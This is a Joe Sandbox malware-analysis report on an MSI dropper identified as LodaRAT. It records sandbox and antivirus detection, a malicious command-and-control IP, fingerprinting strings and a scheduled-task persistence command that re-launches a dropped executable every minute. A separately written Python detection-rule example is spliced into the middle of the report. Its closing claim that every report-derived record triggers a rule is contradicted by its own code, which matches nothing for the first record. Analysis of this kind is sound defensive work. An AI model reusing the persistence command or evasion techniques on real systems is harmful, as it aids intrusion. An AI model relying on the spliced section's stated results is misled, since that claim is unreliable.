                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_0029F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,8_2_0029F78E
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002E7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,8_2_002E7F0E
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_00791E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00791E5A
                Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX (reported 20 times)
                Source: C:\Windows\System32\msiexec.exe | Process information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Installer\MSI77F6.tmp | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Installer\MSI77F6.tmp | Process information set: NOGPFAULTERRORBOX (reported 4 times)
                Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX
                Source: C:\Windows\System32\conhost.exe | Process information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOGPFAULTERRORBOX (reported 4 times)
                Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX (reported twice)
                Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOGPFAULTERRORBOX (reported 4 times)
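The persistence and dropper chain recorded in this section (msiexec starting the MSI*.tmp custom-action binary, a script host run from the user's Temp folder, and schtasks creating a task that re-launches ELJQZX.exe from AppData every minute) is the kind of process-creation sequence a detection rule keys on. The Python below is an added example; it is not part of the Joe Sandbox report and not one of the Sigma rules the report cites. It scores constructed process-creation records, with the Image, ParentImage and CommandLine fields of a Sysmon Event ID 1, built from the command lines shown on this page, plus one benign scheduled-task control. The wscript command line is an assumption consistent with the dropped PAITNR.vbs; the report itself does not print it.

```python
import re
from dataclasses import dataclass

# Paths an unprivileged user can write to; a task or script living here is the
# signal, not schtasks/wscript themselves, which are common in legitimate use.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\AppData\\|\\Temp\\|\\ProgramData\\|\\Users\\Public\\",
    re.IGNORECASE,
)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
# /tn, /tr, /sc, /mo switches of "schtasks /create"; values may be quoted.
SCHTASKS_ARG = re.compile(r'/(tn|tr|sc|mo)\s+("[^"]*"|\S+)', re.IGNORECASE)
# Windows Installer custom-action binaries are named MSI<hex>.tmp.
MSI_TMP = re.compile(r"msi[0-9a-f]+\.tmp", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    image: str          # Sysmon Image
    parent_image: str   # Sysmon ParentImage
    command_line: str   # Sysmon CommandLine


# Constructed records mirroring the report (PIDs omitted). The wscript command
# line is assumed, not printed by the report; the last record is a benign control.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\Installer\MSI77F6.tmp", r"C:\Windows\System32\msiexec.exe",
              r'"C:\Windows\Installer\MSI77F6.tmp"'),
    ProcEvent(r"C:\Windows\SysWOW64\wscript.exe", r"C:\Windows\Installer\MSI77F6.tmp",
              r'wscript.exe "C:\Users\user\AppData\Local\Temp\PAITNR.vbs"'),
    ProcEvent(r"C:\Windows\SysWOW64\schtasks.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r"schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe", r"C:\Windows\System32\cmd.exe",
              r'schtasks /create /tn NightlyBackup /tr "C:\Program Files\Backup\backup.exe" /sc daily /st 02:00'),
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def schtasks_args(command_line):
    """Map the /tn /tr /sc /mo switches of a schtasks command line to their values."""
    return {k.lower(): v.strip('"') for k, v in SCHTASKS_ARG.findall(command_line)}


def evaluate(events):
    """Return (rule, detail) pairs for every record that matches a rule."""
    hits = []
    for ev in events:
        image, parent = basename(ev.image), basename(ev.parent_image)

        # Rule 1: a task firing every few minutes whose action lives in a user path.
        if image == "schtasks.exe" and "/create" in ev.command_line.lower():
            args = schtasks_args(ev.command_line)
            modifier = int(args["mo"]) if args.get("mo", "").isdigit() else 1
            if (args.get("sc", "").lower() == "minute" and modifier <= 5
                    and USER_WRITABLE.search(args.get("tr", ""))):
                hits.append(("schtasks_minute_task_to_user_path", args.get("tn", "")))

        # Rule 2: a script host handed a script from Temp/AppData.
        if image in SCRIPT_HOSTS and USER_WRITABLE.search(ev.command_line):
            hits.append(("script_host_from_user_path", image))

        # Rule 3: an MSI custom-action binary under C:\Windows\Installer spawning
        # an interpreter; an installer rarely needs a script host or cmd.exe.
        if (MSI_TMP.fullmatch(parent)
                and ev.parent_image.lower().startswith("c:\\windows\\installer\\")
                and (image in SCRIPT_HOSTS or image == "cmd.exe")):
            hits.append(("msi_custom_action_spawns_interpreter", f"{parent} -> {image}"))
    return hits


if __name__ == "__main__":
    for rule, detail in evaluate(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

Run against the sample records, the three report-derived events fire one rule each (the wscript record fires two, once for the Temp-folder script and once for its MSI*.tmp parent) while the daily backup task is left alone; the interval threshold and path list are the knobs to tune per environment.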

                Malware Analysis System Evasion

                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
                Source: C:\Windows\Installer\MSI77F6.tmp | Window / User API: threadDelayed 5387
                Source: C:\Windows\Installer\MSI77F6.tmp | Window / User API: foregroundWindowGot 1288
                Source: C:\Windows\Installer\MSI77F6.tmp | API coverage: 6.4 %
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | API coverage: 3.7 %
                Source: C:\Windows\Installer\MSI77F6.tmp TID: 6972 | Thread sleep time: -53870s >= -30000s
                Source: C:\Windows\Installer\MSI77F6.tmp | Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\Installer\MSI77F6.tmp | Thread sleep count: Count: 5387 delay: -10
                Source: Yara match | File source: 00000006.00000002.3415165237.0000000003288000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3418899166.0000000004D99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3414950251.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3415165237.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: MSI77F6.tmp PID: 3192, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: wscript.exe PID: 2732, type: MEMORYSTR
                Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\PAITNR.vbs, type: DROPPED
                Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation (reported 7 times)
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_0078DD92 GetFileAttributesW,FindFirstFileW,FindClose,3_2_0078DD92
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007C2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_007C2044
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007C219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_007C219F
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007C24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_007C24A9
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007B6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,3_2_007B6B3F
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007B6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,3_2_007B6E4A
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007BF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_007BF350
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007BFD47 FindFirstFileW,FindClose,3_2_007BFD47
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007BFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_007BFDD2
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002D2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_002D2044
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002D219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_002D219F
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002D24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_002D24A9
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002C6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,8_2_002C6B3F
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002C6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,8_2_002C6E4A
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002CF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_002CF350
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002CFD47 FindFirstFileW,FindClose,8_2_002CFD47
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_0029DD92 GetFileAttributesW,FindFirstFileW,FindClose,8_2_0029DD92
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002CFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,8_2_002CFDD2
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_0078E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_0078E47B
                Source: ELJQZX.exe, 00000010.00000003.2626247931.0000000000E04000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: MSI77F6.tmp, 00000003.00000002.3415544597.000000000179F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: MSI77F6.tmp, 00000003.00000002.3415544597.00000000017DD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\Installer\MSI77F6.tmp | API call chain: ExitProcess graph end node (graph_3-109848)
                Source: C:\Windows\Installer\MSI77F6.tmp | API call chain: ExitProcess graph end node (graph_3-108254)
                Source: C:\Windows\System32\msiexec.exe | Process information queried: ProcessInformation
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007C703C BlockInput,3_2_007C703C
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_0077374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,3_2_0077374E
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007A46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,3_2_007A46D0
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_008DA0C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,3_2_008DA0C0
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_0079A937 GetProcessHeap,3_2_0079A937
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_00798E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00798E3C
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_00798E19 SetUnhandledExceptionFilter,3_2_00798E19
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002A8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_002A8E3C
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002A8E19 SetUnhandledExceptionFilter,8_2_002A8E19
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007ABE95 LogonUserW,3_2_007ABE95
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_0077374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,3_2_0077374E
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007B4B52 SendInput,keybd_event,3_2_007B4B52
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007B7DD5 mouse_event,3_2_007B7DD5
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007AB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,3_2_007AB398
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007ABE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,3_2_007ABE31
                Source: MSI77F6.tmp, ELJQZX.exe | Binary or memory string: Shell_TrayWnd
                Source: MSI77F6.tmp, 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp, ELJQZX.exe, 00000008.00000002.2219412663.000000000032E000.00000040.00000001.01000000.00000007.sdmp, ELJQZX.exe, 00000009.00000002.2291553073.000000000032E000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_00797254 cpuid 3_2_00797254
                Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation (reported twice)
                Source: C:\Windows\Installer\MSI77F6.tmp | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007940DA GetSystemTimeAsFileTime,__aulldiv,3_2_007940DA
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007EC146 GetUserNameW,3_2_007EC146
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007A2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,3_2_007A2C3C
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_0078E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_0078E47B
                Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: MSI77F6.tmp, 00000003.00000002.3415544597.00000000017CC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\Installer\MSI77F6.tmp | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: Process Memory Space: MSI77F6.tmp PID: 3192, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                Source: ELJQZX.exe, 00000011.00000002.3224043013.000000000032E000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                Source: ELJQZX.exe, 00000011.00000003.3211207397.0000000004C3B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_81
                Source: MSI77F6.tmp, 00000003.00000002.3418698692.0000000004D1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.6|ddd|Pr1024X21280X3|Desktop|0|beta>
                Source: ELJQZX.exe | Binary or memory string: WIN_XP
                Source: ELJQZX.exe | Binary or memory string: WIN_XPe
                Source: MSI77F6.tmp, 00000003.00000002.3418698692.0000000004D1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.6|ddd|Pr1024X21280X3|Desktop|0|beta<
                Source: MSI77F6.tmp, 00000003.00000002.3418698692.0000000004D1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.6|ddd|Pr1024X21280X3|Desktop|0|beta-5910-47F5-8570-5074A8A5636A},
                Source: ELJQZX.exe, 00000008.00000002.2223071461.00000000046E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_81lld
                Source: MSI77F6.tmp, 00000003.00000002.3418899166.0000000004D7A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_81m~
                Source: ELJQZX.exe | Binary or memory string: WIN_VISTA
                Source: MSI77F6.tmp, 00000003.00000002.3415544597.000000000179F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.6|ddd|Pr1024X21280X3|Desktop|0|beta<5(
                Source: MSI77F6.tmp, 00000003.00000002.3415544597.000000000179F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.6|ddd|Pr1024X21280X3|Desktop|0|beta`5d
                Source: MSI77F6.tmp, 00000003.00000002.3415544597.000000000179F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.6|ddd|Pr1024X21280X3|Desktop|0|beta
                Source: ELJQZX.exe, 0000000E.00000003.2443692988.0000000004300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81,
                Source: ELJQZX.exeBinary or memory string: WIN_7
                Source: ELJQZX.exeBinary or memory string: WIN_8
                Source: MSI77F6.tmp, 00000003.00000002.3415544597.000000000179F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|
                Source: MSI77F6.tmp, 00000003.00000002.3418698692.0000000004D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.6|ddd|Pr1024X21280X3|Desktop|0|beta9
                Source: ELJQZX.exe, 00000009.00000002.2294018615.0000000004693000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81T
                Source: Yara matchFile source: Process Memory Space: MSI77F6.tmp PID: 3192, type: MEMORYSTR

Remote Access Functionality

Source: Yara match; File source: Process Memory Space: MSI77F6.tmp PID: 3192, type: MEMORYSTR
Source: Yara match; File source: dump.pcap, type: PCAP
Source: C:\Windows\Installer\MSI77F6.tmp; Code function: 3_2_007C91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,3_2_007C91DC
Source: C:\Windows\Installer\MSI77F6.tmp; Code function: 3_2_007C96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,3_2_007C96E2
Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe; Code function: 8_2_002D91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,8_2_002D91DC
Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe; Code function: 8_2_002D96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,8_2_002D96E2
Tactic matrix (techniques listed per tactic column; numbers preceding a technique are the counts shown in the original report):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: 11 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: 2 Valid Accounts; 1 Replication Through Removable Media; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 11 Windows Management Instrumentation; 1 Native API; 1 Scheduled Task/Job; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 11 Scripting; 1 DLL Side-Loading; 2 Valid Accounts; 1 Scheduled Task/Job; 11 Registry Run Keys / Startup Folder; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 12 Process Injection; 1 Scheduled Task/Job; 11 Registry Run Keys / Startup Folder; Scheduled Task/Job; At; Cron
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 21 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 121 Masquerading; 2 Valid Accounts; 12 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 12 Process Injection
Credential Access: 21 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 2 System Time Discovery; 11 Peripheral Device Discovery; 1 Account Discovery; 2 File and Directory Discovery; 28 System Information Discovery; 251 Security Software Discovery; 12 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 1 Archive Collected Data; 21 Input Capture; 3 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 1 Ingress Tool Transfer; 1 Encrypted Channel; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph ID: 1582344, Sample: test.msi, Startdate: 30/12/2024, Architecture: WINDOWS, Score: 100
Signatures on the sample: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected LodaRAT; 5 other signatures
Processes started from the sample: msiexec.exe; ELJQZX.exe; ELJQZX.exe; 5 other processes
msiexec.exe: dropped C:\Windows\Installer\MSI77F6.tmp (PE32); Drops executables to the windows directory (C:\Windows) and starts them; started MSI77F6.tmp
ELJQZX.exe: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Found API chain indicative of sandbox detection
MSI77F6.tmp: network contact 172.111.138.100, 49762, 49826, 49885, VOXILITYGB, United States; dropped C:\Users\user\AppData\Roaming\...LJQZX.exe (PE32) and C:\Users\user\AppData\Local\Temp\PAITNR.vbs (ASCII); Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; started cmd.exe and wscript.exe
cmd.exe: Uses schtasks.exe or at.exe to add and modify task schedules; started conhost.exe and schtasks.exe
wscript.exe: Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source | Detection | Scanner | Label
test.msi | 58% | ReversingLabs | Script-AutoIt.Trojan.Heuristic
test.msi | 61% | Virustotal |

Source | Detection | Scanner | Label
C:\Windows\Installer\MSI77F6.tmp | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | 88% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | 52% | Virustotal |
C:\Windows\Installer\MSI77F6.tmp | 88% | ReversingLabs | Win32.Trojan.Generic
C:\Windows\Installer\MSI77F6.tmp | 52% | Virustotal |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://ip-score.com/checkip/6; | MSI77F6.tmp, 00000003.00000002.3415544597.000000000179F000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
172.111.138.100 | unknown | United States | 3223 | VOXILITYGB | true
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1582344
                  Start date and time:2024-12-30 11:35:22 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 9m 37s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
